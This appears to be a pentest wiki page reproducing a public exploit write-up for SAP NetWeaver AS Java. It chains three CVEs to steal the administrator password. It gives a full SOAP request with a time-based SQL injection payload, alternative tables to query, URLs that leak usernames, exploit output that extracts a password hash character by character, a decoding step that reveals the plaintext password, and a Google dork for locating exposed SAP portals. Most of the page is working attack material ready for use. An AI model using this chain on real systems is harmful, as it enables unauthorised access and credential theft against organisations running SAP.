Exploit

SAP_exploit

Author: Vahagn Vardanyan https://twitter.com/vah_13

Bugs:

CVE-2016-2386 SQL injection

CVE-2016-2388 Information disclosure

CVE-2016-1910 Crypto issue

Follow HTTP request is a simple PoC for anon time-based SQL injection (CVE-2016-2386) vulnerability in SAP NetWeaver AS Java UDDI 7.11-7.50

  
    POST /UDDISecurityService/UDDISecurityImplBean HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
    SOAPAction:
    Content-Type: text/xml;charset=UTF-8
    Host: nw74:50000
    Content-Length: 500

    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:sec="http://sap.com/esi/uddi/ejb/security/">
	  <soapenv:Header/>
	  <soapenv:Body>
		<sec:deletePermissionById>
		  <permissionId>1' AND 1=(select COUNT(*) from J2EE_CONFIGENTRY, UME_STRINGS where UME_STRINGS.PID like '%PRIVATE_DATASOURCE.un:Administrator%' and UME_STRINGS.VAL like '%SHA-512%') AND '1'='1</permissionId>
		</sec:deletePermissionById>
	  </soapenv:Body>
    </soapenv:Envelope>

In SAP test server I have admin user who login is "Administrator" and so I used this payload

    %PRIVATE_DATASOURCE.un:Administrator%

most SAP's using j2ee_admin username for SAP administrator login

    %PRIVATE_DATASOURCE.un:j2ee_admin%

You can get all SAP users login using these URLs (CVE-2016-2388 - information disclosure)

	1)	http:/SAP_IP:SAP_PORT/webdynpro/resources/sap.com/tc~rtc~coll.appl.rtc~wd_chat/Chat#
	2)	http:/SAP_IP:SAP_PORT/webdynpro/resources/sap.com/tc~rtc~coll.appl.rtc~wd_chat/Messages#

Instead of J2EE_CONFIGENTRY table you can use this tables

        UME_STRINGS_PERM
        UME_STRINGS_ACTN
        BC_DDDBDP
        BC_COMPVERS
        TC_WDRR_MRO_LUT
        TC_WDRR_MRO_FILES
        T_CHUNK                !!! very big table, if SAP server will not response during 20 seconds then you have SQL injection
        T_DOMAIN
        T_SESSION
        UME_ACL_SUP_PERM
        UME_ACL_PERM
        UME_ACL_PERM_MEM

An example of a working exploit

	C:\Python27\python.exe SQL_injection_CVE-2016-2386.py --host nw74 --port 50000
	start to retrieve data from the table UMS_STRINGS from nw74 server using CVE-2016-2386 exploit
	this may take a few minutes
	Found {SHA-512, 10000, 24}M
	Found {SHA-512, 10000, 24}MT
	Found {SHA-512, 10000, 24}MTI
	Found {SHA-512, 10000, 24}MTIz
	Found {SHA-512, 10000, 24}MTIzU
	Found {SHA-512, 10000, 24}MTIzUV
	Found {SHA-512, 10000, 24}MTIzUVd
	Found {SHA-512, 10000, 24}MTIzUVdF
	Found {SHA-512, 10000, 24}MTIzUVdFY
	Found {SHA-512, 10000, 24}MTIzUVdFYX
	Found {SHA-512, 10000, 24}MTIzUVdFYXN
	Found {SHA-512, 10000, 24}MTIzUVdFYXNk
	Found {SHA-512, 10000, 24}MTIzUVdFYXNk8
	Found {SHA-512, 10000, 24}MTIzUVdFYXNk88
	Found {SHA-512, 10000, 24}MTIzUVdFYXNk88F
	Found {SHA-512, 10000, 24}MTIzUVdFYXNk88Fx
	Found {SHA-512, 10000, 24}MTIzUVdFYXNk88Fxu
	Found {SHA-512, 10000, 24}MTIzUVdFYXNk88FxuY
	Found {SHA-512, 10000, 24}MTIzUVdFYXNk88FxuYC
	Found {SHA-512, 10000, 24}MTIzUVdFYXNk88FxuYC6
	Found {SHA-512, 10000, 24}MTIzUVdFYXNk88FxuYC6X

And finaly using CVE-2016-1910 (Crypto issue) you can get administrator password in plain text

	base64_decode(MTIzUVdFYXNk88FxuYC6X)=123QWEasdóÁq¹�ºX

[PDF whitepaper] https://erpscan.com/wp-content/uploads/2017/12/Hardcore-SAP-Penetration-Testing.pdf

[SAP-Google-Dork] inurl:/irj/portal

PreviousSAP Pentest NextSQLi Avanzado

Last updated 2 years ago

Was this helpful?